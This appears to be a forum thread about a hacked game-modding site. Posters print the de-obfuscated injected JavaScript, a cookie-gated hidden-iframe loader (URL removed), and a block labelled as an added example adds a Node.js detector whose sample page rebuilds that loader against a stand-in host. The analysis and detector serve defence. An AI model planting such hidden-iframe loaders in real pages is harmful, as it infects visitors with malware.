Project Perfect Mod Forums
YR Argentina infected?
Page 1 of 1 [36 Posts]
gameaddict11707 (Grenadier)
Joined: 15 Jul 2011
PostPosted: Sat Jun 15, 2013 5:58 pm    Post subject: YR Argentina infected?

I've tried to go onto YR Argentina the past couple of days now, and whenever I do, AVG lights up mentioning a Blackhole exploit kit-type of virus threat and doesn't let me go onto the site. After temporarily deactivating AVG (I had other AV programs, I just wanted to see if they would chime in too), Google Chrome itself makes a mention about malware from some sketchy German website being injected into YRArg. (I don't remember what the sketchy site's URL was and I can't get the message to reappear.)

Anyone else getting stuff similar to this when they try to go onto YR Argentina?

tomsons26lv (Cyborg Artillery)
Joined: 30 Dec 2009
Location: Latvia
PostPosted: Sat Jun 15, 2013 6:07 pm

Yup, Chrome:
Quote:
Danger: Malware Ahead!
Google Chrome has blocked access to this page on yrarg.cncguild.net.
Content from www.toeppler-vertretungen.de, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.
Malware is malicious software that causes things like identity theft, financial loss, and permanent file deletion.

_________________
Tiberian Dawn, Red Alert, Tiberian Sun, Red Alert 2, Renegade, Command & Conquer 3, Tiberium and Tiberium Wars and Westwood related image & video archive
https://picasaweb.google.com/113361105083292812413?noredirect=1

Skype live:tomsons26
Don't forget to state who you are, otherwise I'll ignore the invite

DaRkGlAcEoN (Rocket Cyborg)
Joined: 13 May 2013
Location: Canada
PostPosted: Sat Jun 15, 2013 6:08 pm

Weird... I haven't had any problems with it...

_________________
You can call me Dark or Glace/Glaceon if my name is annoying to type.

4StarGeneral wrote:
I CAN USE CAPS TOO, HOW DOES IT FEEL?

Zero18 (Commander)
Joined: 10 Dec 2012
Location: I'm too busy conquering the world!
PostPosted: Sat Jun 15, 2013 8:30 pm

Waterfox is the way to go. I used to have Internet Explorer, then I moved on to Google Chrome, and now Waterfox. IE and Google Chrome are crap; they go super slow for me. But with Waterfox, it just loads fast and everything is much smoother.

_________________
Mod Leader and founder of World Domination


tomsons26lv (Cyborg Artillery)
Joined: 30 Dec 2009
Location: Latvia
PostPosted: Sat Jun 15, 2013 9:23 pm

Zero18 wrote:
Waterfox is the way to go. I used to have Internet Explorer, then I moved on to Google Chrome, and now Waterfox. IE and Google Chrome are crap; they go super slow for me. But with Waterfox, it just loads fast and everything is much smoother.

Chrome checks every connection against an online database of known malware/spyware/virus/trojan/etc. spreader sites, and if a site matches the DB it displays that warning. Firefox had a similar function as well. Anyone who was successfully able to access this site after the 12th of June can pretty much consider that their computer has been infested.
Unlike what sometimes happens with antiviruses, these are not false positives.

_________________
Tiberian Dawn, Red Alert, Tiberian Sun, Red Alert 2, Renegade, Command & Conquer 3, Tiberium and Tiberium Wars and Westwood related image & video archive
https://picasaweb.google.com/113361105083292812413?noredirect=1

Skype live:tomsons26
Don't forget to state who you are, otherwise I'll ignore the invite

Last edited by tomsons26lv on Sat Jun 15, 2013 10:03 pm; edited 2 times in total

gameaddict11707 (Grenadier)
Joined: 15 Jul 2011
PostPosted: Sat Jun 15, 2013 9:50 pm

Zero18 wrote:
Firefox is the way to go. I used to have Internet Explorer, then I moved on to Google Chrome, and now Firefox. IE and Google Chrome are crap; they go super slow for me. But with Firefox, it just loads fast and everything is much smoother.

Firefox LLLAAAGGGSSS when I use it, and when I try to do a bandwidth test on CNet, it gets thousands of JavaScript errors. I barely use Explorer other than to download Firefox or Chrome.

Zero18 (Commander)
Joined: 10 Dec 2012
Location: I'm too busy conquering the world!
PostPosted: Sat Jun 15, 2013 10:02 pm

FYI, it is WATERFOX, not Firefox... it doesn't lag for me. Internet Explorer and Chrome do lag for me and are way annoying. For Waterfox, very little to none. That's why I choose Waterfox over other net programs.

_________________
Mod Leader and founder of World Domination


gameaddict11707 (Grenadier)
Joined: 15 Jul 2011
PostPosted: Sat Jun 15, 2013 10:12 pm

I thought you were being funny or something and calling Firefox "Waterfox". I had never heard of Waterfox until, well, when I read that post and looked it up for myself.

_________________
aka SavebearingBoss

Renegade (Cyborg Artillery)
Joined: 21 May 2006
Location: Hamburg, Germany
PostPosted: Sat Jun 15, 2013 11:06 pm

Since FF has one of the leading JS engines on the market, you can be pretty sure that the "thousands of JavaScript errors" were due to bad development on the publisher's side, not due to FF.

IE also has a site security check proxy, like Chrome and FF.

As for the issue at hand, it looks like the maintainers of YR Arg have set it to a maintenance page because of the issue, but the issue remains on said maintenance page.

It looks like a very crude JavaScript injection, placing obfuscated JS code before and after the actual HTML of the site.

My guess would be an SQL injection attack dropping this into some template-related table, but it could just as well be a compromised PHP script.

And yes, as tomsons26lv pointed out, if you did end up going to the site and your AV protection didn't stop the script, you should worry. I'll try to de-obfuscate it to see what it actually does.

Update: This is the code that is actually executed on the page:
Code:
 function zzzfff() {
     var ultze = document.createElement('iframe');

     ultze.src = '[URL REMOVED BECAUSE PEOPLE ARE MORONS]';
     ultze.style.position = 'absolute';
     ultze.style.border = '0';
     ultze.style.height = '1px';
     ultze.style.width = '1px';
     ultze.style.left = '1px';
     ultze.style.top = '1px';

     if (!document.getElementById('ultze')) {
         document.write('<div></div>');
         document.getElementById('ultze').appendChild(ultze);
     }
 }

 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }

 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) &&
         (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');

         zzzfff();
     }
 }

For those not firm in JavaScript, it's injecting a tiny, pretty much invisible IFrame into the page to load a hostile site.
I'm writing an e-mail to the owner of the site that's being abused for the distribution to get it taken down.

_________________
#renproj:renegadeprojects.com via Matrix - direct link
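The loader Renegade de-obfuscated above has a recognisable shape: a 1x1 px, absolutely positioned iframe pointing at another host, created from script, inserted through document.write, and gated behind a cookie so each visitor is hit once and repeat visits look clean. As an added example that is not part of the thread or of any poster's code, the following Node.js script scans raw HTML for that shape, so it can be run over a page fetched with curl or over template files pulled from the server without a browser. The sample page, the host names (yrarg.cncguild.net as the site, malware.example as the iframe target), the 2 px threshold and all function names are assumptions constructed for the demo.

```javascript
// Added example, not code from the thread: a static scanner for the injection
// pattern Renegade de-obfuscated (1x1 off-site iframe, cookie-gated, inserted
// via document.write). Works on raw HTML; no browser, no dependencies.
// All sample data, host names and thresholds below are constructed for the demo.
'use strict';

const TINY_PX = 2; // an iframe no larger than 2x2 px is treated as invisible

// Parse name="value" / name='value' / name=value pairs out of a tag's attribute text.
function parseAttrs(tagBody) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// "1", "1px", " 1.5px " -> number; anything else -> NaN.
function pxValue(s) {
  const m = s == null ? null : /^\s*(\d+(?:\.\d+)?)\s*(?:px)?\s*$/.exec(s);
  return m ? parseFloat(m[1]) : NaN;
}

function firstNumber(...vals) {
  for (const v of vals) if (!Number.isNaN(v)) return v;
  return NaN;
}

// Size from the width=/height= attributes first, then from the style="" attribute.
// The (?:^|;) anchor keeps "max-width:" and "line-height:" from matching.
function iframeSize(attrs) {
  const style = attrs.style || '';
  const styleProp = (name) =>
    (new RegExp(`(?:^|;)\\s*${name}\\s*:\\s*([^;]+)`, 'i').exec(style) || [])[1];
  return {
    w: firstNumber(pxValue(attrs.width), pxValue(styleProp('width'))),
    h: firstNumber(pxValue(attrs.height), pxValue(styleProp('height'))),
  };
}

// Hostname of an iframe src; relative URLs resolve to the site's own host.
function hostOf(src, siteHost) {
  try {
    return new URL(src, `http://${siteHost}/`).hostname.toLowerCase();
  } catch (e) {
    return '';
  }
}

// 1. Invisible <iframe> tags whose src is not on the site itself.
function findHiddenIframes(html, siteHost) {
  const site = siteHost.toLowerCase();
  const hits = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const { w, h } = iframeSize(attrs);
    const host = hostOf(attrs.src || '', site);
    if (w <= TINY_PX && h <= TINY_PX && host !== '' && host !== site) {
      hits.push({ src: attrs.src, host, width: w, height: h });
    }
  }
  return hits;
}

// 2. Inline scripts that build such an iframe at runtime. Each reason is one
//    trait of the sample in the thread; one alone is weak evidence, all of
//    them together are the classic drive-by loader.
function findInjectedScripts(html) {
  const findings = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m, index = 0;
  while ((m = re.exec(html)) !== null) {
    index++;
    const body = m[1];
    if (!/createElement\s*\(\s*['"]iframe['"]\s*\)/i.test(body)) continue;
    const reasons = ['creates an iframe from script'];
    if (/(?:width|height)\s*=\s*['"]?\s*[0-2](?:px)?\s*['";\s)]/i.test(body)) reasons.push('sizes it at 2px or less');
    if (/document\.cookie/.test(body)) reasons.push('cookie-gated, so each victim is hit once and repeat visits look clean');
    if (/document\.write\s*\(/.test(body)) reasons.push('inserts its container with document.write');
    findings.push({ script: index, reasons });
  }
  return findings;
}

function scanPage(html, siteHost) {
  return { iframes: findHiddenIframes(html, siteHost), scripts: findInjectedScripts(html) };
}

// Constructed sample page: one legitimate same-site embed, one injected 1px
// iframe, a runtime loader shaped like the de-obfuscated sample, one harmless script.
const SAMPLE_HTML = `<!DOCTYPE html><html><head><title>constructed sample</title></head><body>
<iframe src="/forum/embed.php" width="600" height="400"></iframe>
<p>site content</p>
<iframe src="http://malware.example/in.php" style="position:absolute;border:0;height:1px;width:1px;left:1px;top:1px"></iframe>
<script>
function zzzfff() {
  var f = document.createElement('iframe');
  f.src = 'http://malware.example/in.php';
  f.style.position = 'absolute'; f.style.height = '1px'; f.style.width = '1px';
  if (!document.getElementById('ultze')) {
    document.write('<div id="ultze"></div>');
    document.getElementById('ultze').appendChild(f);
  }
}
if (navigator.cookieEnabled && document.cookie.indexOf('visited_uq=55') < 0) {
  document.cookie = 'visited_uq=55; path=/';
  zzzfff();
}
</script>
<script>console.log('harmless inline script');</script>
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanPage(SAMPLE_HTML, 'yrarg.cncguild.net'), null, 2));
}
```

Run it as `node scan.js` to see the report for the constructed page; to check a live page, feed it the output of `curl -s` and the site's own hostname. A same-site 1x1 iframe is deliberately not flagged, since tracking pixels and legitimate embeds use the same dimensions; the signal here is the combination of invisible size and a foreign host, or of script-built iframe plus cookie gate plus document.write.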

MasterHaosis (General)
Joined: 01 Nov 2010
Location: Serbia
PostPosted: Sun Jun 16, 2013 3:36 am


_________________

PPM Halloween Season 2021

Banshee (Supreme Banshee)
Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil
PostPosted: Sun Jun 16, 2013 3:49 am

YR Argentina has been fully compromised (FTP- and MySQL-wise), probably due to an exploit in an old version of Joomla. Hopefully, things should be fixed in a couple of days.

warlock (AA Infantry)
Joined: 07 Jun 2006
Location: Bournemouth, UK
PostPosted: Wed Jun 19, 2013 10:06 am

Yeah... Also now YRArg is suspended... Yesterday I tried to go to the site...

RP (Commander)
Joined: 12 Jul 2012
Location: Mapping God Heaven
PostPosted: Wed Jun 19, 2013 10:09 am

It's being worked on, and that takes some time.

_________________


Mental Omega 3.0 Mission creator - Creator of FinalOmega: APYR 3.0 Map Editor

/ppm/'s stupidity

warlock (AA Infantry)
Joined: 07 Jun 2006
Location: Bournemouth, UK
PostPosted: Wed Jun 19, 2013 10:30 am

Oh... That's good! Thanks for the news! :D
Because it is a really good resource site! :D

Martin Killer (Missile Trooper)
Joined: 27 Nov 2005
PostPosted: Wed Jun 19, 2013 10:50 am

The last uninfected backup is from February 2013; that's over 15-20 files to upload to be up to date.

Banshee (Supreme Banshee)
Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil
PostPosted: Wed Jun 19, 2013 12:47 pm

Yea... but you can't use that version of Joomla again, since it actually causes trouble for every other site on the server, including PPM itself.

Martin Killer (Missile Trooper)
Joined: 27 Nov 2005
PostPosted: Wed Jun 19, 2013 12:49 pm

Still, we can do a fast migration of the downloads to a still-supported version of Joomla (2.5+). There is a tutorial on how to do it; if it works, then I don't need to place over 800+ files manually. Most of the components or plugins were free; only the template was bought earlier.

MasterHaosis (General)
Joined: 01 Nov 2010
Location: Serbia
PostPosted: Wed Jun 19, 2013 2:50 pm

How did it actually get infected?

_________________

PPM Halloween Season 2021

RP (Commander)
Joined: 12 Jul 2012
Location: Mapping God Heaven
PostPosted: Wed Jun 19, 2013 2:57 pm

I dunno...

Renegade wrote:
Code:
function zzzfff() {
    var ultze = document.createElement('iframe');

    ultze.src = '[URL REMOVED BECAUSE PEOPLE ARE MORONS]';
    ultze.style.position = 'absolute';
    ultze.style.border = '0';
    ultze.style.height = '1px';
    ultze.style.width = '1px';
    ultze.style.left = '1px';
    ultze.style.top = '1px';

    if (!document.getElementById('ultze')) {
        document.write('<div></div>');
        document.getElementById('ultze').appendChild(ultze);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        zzzfff();
    }
}

For those not firm in JavaScript, it's injecting a tiny, pretty much invisible IFrame into the page to load a hostile site.
I'm writing an e-mail to the owner of the site that's being abused for the distribution to get it taken down.

_________________


Mental Omega 3.0 Mission creator - Creator of FinalOmega: APYR 3.0 Map Editor

/ppm/'s stupidity

Banshee (Supreme Banshee)
Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil
PostPosted: Wed Jun 19, 2013 3:21 pm

Phil is trying to figure out how the JavaScript infection happened. According to him, it happened on June 15th; however, the site was compromised 9 days earlier.

Martin Killer (Missile Trooper)
Joined: 27 Nov 2005
PostPosted: Wed Jun 19, 2013 7:42 pm

Ok, I've got the password to my FTP account back, and this is how it looks as of today:
    1. Migration from the no-longer-supported 1.5 to 2.5 is a must.
    2. Because of the migration, some commercial things like the template or some plugins won't be back. Spending $50 on this would be a stupid move imho.
    3. The best thing is that I have an uninfected backup from the 25th of April 2013. Thus I will only have to re-upload 10 to 15 files.
    4. Because I've never done a migration from an older to a newer version, it will take some time until the website goes public. I will try to migrate all users, comments, articles and so on, but the first priority is the download section with 750+ files. If I fail to migrate everything except the downloads, the site will be public for sure - only the files are important imho.

Sir Shockwave (Cyborg Firebomber)
Joined: 06 Sep 2011
PostPosted: Thu Jun 20, 2013 7:19 am

I'm having a similar problem at the moment, except I keep getting a "403 Forbidden" error. Glad to see it's not just us having problems.

Banshee (Supreme Banshee)
Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil
PostPosted: Thu Jun 20, 2013 11:59 am

The 403 problem that you are getting at YR Argentina is done on purpose. Some things about this hacking event still need to be fixed before the site returns.

DarkVen9109 (Pyro Sniper)
Joined: 02 Nov 2012
Location: Philippines
PostPosted: Thu Jun 20, 2013 12:14 pm

Gerrd just visited the site and it is really forbidden. Dang!!

Renegade (Cyborg Artillery)
Joined: 21 May 2006
Location: Hamburg, Germany
PostPosted: Fri Jun 21, 2013 6:56 pm

Would this be a good moment to point out that Joomla sucks?

Seriously, there is no clean upgrade path from 1.5 to 2.5, afaik, so you're looking at a fresh installation and a whole lot of redoing anyway.

So use the opportunity to take a look around, compare, and get rid of Joomla.

Also, unless somebody manually deleted those uploaded files, they should still be on the server. While it of course can't be ruled out, it's unlikely they've been infected with something, and there are enough Linux CLI AV scanners to check them. You can/should also compare the hashes of the uploaded files against your local copies.

If the uploaded files are clean, there's no reason to re-upload them. Just copy the clean uploads elsewhere, renew the CMS, and move the uploads back.

_________________
#renproj:renegadeprojects.com via Matrix - direct link

Banshee (Supreme Banshee)
Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil
PostPosted: Fri Jun 21, 2013 9:14 pm

If it depended only on me, I'd never have used Joomla. I'd use the 3rd Age Articles System, which is the Revora official CMS software.

Martin Killer (Missile Trooper)
Joined: 27 Nov 2005
PostPosted: Sun Jun 23, 2013 8:14 pm


!DarkRose (Commander)
Joined: 13 Aug 2006
Location: U.K, Birmingham
PostPosted: Sun Jun 23, 2013 8:30 pm

:3
Good to have you back online!

_________________

Silly taco fumbling unicorns nocturnally launch basketballs, Hell March.

MasterHaosis (General)
Joined: 01 Nov 2010
Location: Serbia
PostPosted: Mon Jun 24, 2013 12:40 am

Renegade wrote:
Would this be a good moment to point out that Joomla sucks?

I would not like to sound like a smartass, really, but if you ask me, just the name Joomla sucks, and I haven't heard a more idiotic name for something than that. But really. Just its name looks like it came from a cartoon. Dumb and retarded name, although it's a matter of personal opinion, and also it is a matter of how useful Joomla actually is rather than how it sounds. But according to the comments, it is not much use either.

Banshee (Supreme Banshee)
Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil
PostPosted: Mon Jun 24, 2013 1:11 am


Last edited by Banshee on Mon Jun 24, 2013 1:40 am; edited 1 time in total

MasterHaosis (General)
Joined: 01 Nov 2010
Location: Serbia
PostPosted: Mon Jun 24, 2013 1:27 am

That is good to hear indeed

_________________

PPM Halloween Season 2021

!DarkRose (Commander)
Joined: 13 Aug 2006
Location: U.K, Birmingham
PostPosted: Mon Jun 24, 2013 6:39 am

Banshee wrote:
!DarkRose wrote:
:3
Good to have you back online!


He means that YR Argentina is back online.
http://yrarg.cncguild.net


I know ;)

_________________

Silly taco fumbling unicorns nocturnally launch basketballs, Hell March.

Deformat (Defense Minister)
Joined: 17 Sep 2007
PostPosted: Mon Jun 24, 2013 4:42 pm

Good to see you still around, DR!

!DarkRose (Commander)
Joined: 13 Aug 2006
Location: U.K, Birmingham
PostPosted: Wed Jun 26, 2013 1:01 am

Yup, still visit here when I can. ^_^
Been busy with the job and stuff but got back into modding again, so I've started working on some secret stuff. :3

_________________

Silly taco fumbling unicorns nocturnally launch basketballs, Hell March.

Martin Killer (Missile Trooper)
Joined: 27 Nov 2005
PostPosted: Tue Jul 02, 2013 11:32 am

Back online with an old template

MasterHaosis (General)
Joined: 01 Nov 2010
Location: Serbia
PostPosted: Tue Jul 02, 2013 11:44 am

So you are indeed a killer. You killed the virus. :D

_________________

PPM Halloween Season 2021

Powered by phpBB © phpBB Group